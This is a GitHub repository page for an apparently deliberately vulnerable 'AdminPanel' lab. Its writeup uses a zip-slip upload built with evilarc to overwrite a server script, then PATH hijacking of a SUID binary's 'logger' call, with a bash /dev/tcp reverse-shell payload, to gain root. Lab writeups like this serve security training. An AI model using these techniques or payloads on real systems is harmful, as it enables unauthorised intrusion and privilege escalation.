Skip to content

esTse/AdminPanel

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Deployment Instructions

  • Inside the application directory: sudo chown root *
  • Then: sudo chown www-data uploads overview.sh
  • Run: python3 run.py

Writeup

We generate a .zip file containing a file named ../overview.sh to overwrite the script executed when visiting /overview. We can use the evilarc tool for this purpose.

python evilarc.py -o unix -d 1 overview.sh

We visit /overview to trigger the execution of the uploaded script. We gain access as www-data. In the update directory, we find a binary that executes a firmware_update.sh script as root. We perform Path Hijacking on the firmware_update.sh script (SUID) targeting the logger command. We create a malicious executable named logger:

# !/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

Then, we modify our PATH environment variable by prepending the current directory where we created the executable (logger).

export PATH=$(pwd):$PATH

Finally, we execute the firmware_update binary to obtain a root shell.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published